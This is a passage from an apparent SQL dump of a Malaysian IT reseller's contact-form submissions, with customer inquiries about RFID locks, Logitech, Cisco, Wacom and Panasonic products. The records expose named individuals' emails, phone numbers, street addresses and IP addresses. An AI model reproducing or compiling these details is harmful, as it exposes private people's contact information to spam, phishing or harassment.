creations\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:158:\"Hi there, would like to inquire on your RFID locks, is it suitable for lockers? Can I please get the dimension? Also, can the RFID be linked to the main door?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"94\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-13 12:33:18','121.121.93.38','1'),(57,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"MONG SWEE PENG\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"mong_sp@transfame.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60122076898\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Transfame Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:86:\"B902, KELANA BUSINESS CENTRE, JALAN SS 7/2, KELANA JAYA, 47301 PETALING JAYA, SELANGOR\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Please quote in Ringgit Malaysia\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"10\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-15 18:35:34','175.142.227.169','1'),(58,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"FARWINA FAROQUE\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"farwina@dogood.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126720507\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"HIKMAH Wilayah\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:43:\"No 1-2, Jalan Putra 3,, Taman Putra Kajang,\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Logitech Group, Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:94:\"We need quotation for 2 sets of webcam plus microphone and speaker for online meeting facility\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-16 12:18:39','42.188.9.255','1'),(59,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Sow Chee Hong\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"dnetpower@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"011-16829580\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"DNET POWER COMPUTER CENTRE\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:105:\"Hi, i looking for COM INTUOS S -BLACK (CTL-4100) for my customer. Can i know how much you sell this item?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"97\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-17 16:41:25','60.50.239.211','1'),(60,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Sow Chee Hong\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"dnetpower@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"011-16829580\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"DNET POWER COMPUTER CENTRE\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:107:\"Hi, i looking for WACOM INTUOS S -BLACK (CTL-4100) for my customer. Can i know how much you sell this item?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"77\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-17 16:42:29','60.50.239.211','1'),(61,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Muhammad Fahimi Bin Roslan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"fahimimuhd@twsolutions.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"019 3179633\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Techworks Solutions Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:156:\"Kiindly Please Quote Us, Below the details :- 1. 1. Firewall Cisco ASA 5515-X. 2. 2. Cisco Catalyst 2960-X Switch 48 Port WS-C2960X-48TD-L 4 Unit 1 Unit. 2.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-18 12:54:15','202.190.188.239','1'),(62,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Muhammad Fahimi Bin Roslan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"fahimimuhd@twsolutions.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"019 3179633\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Techworks Solutions Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:156:\"Kiindly Please Quote Us, Below the details :- 1. 1. Firewall Cisco ASA 5515-X. 2. 2. Cisco Catalyst 2960-X Switch 48 Port WS-C2960X-48TD-L 4 Unit 1 Unit. 2.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-18 12:54:17','202.190.188.239','1'),(63,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Paavitra Nair\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"qsesb@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0166176812\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"QUANTUM SYSTEM ENGINEERING\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:64:\"NO 11-1, Jalan Laman Suria 1, Taman Laman Suria 71700 Mantin N.S\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"21\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-02-18 15:58:57','175.140.93.194','1'),(64,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Sivanesh\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Teqnida@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0197752704\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Teqnida@gmail.com\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:72:\"No.32-01, Jln Permas 11/1A. Bandar Baru Permas Jaya. 81750. Masai. Johor\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD 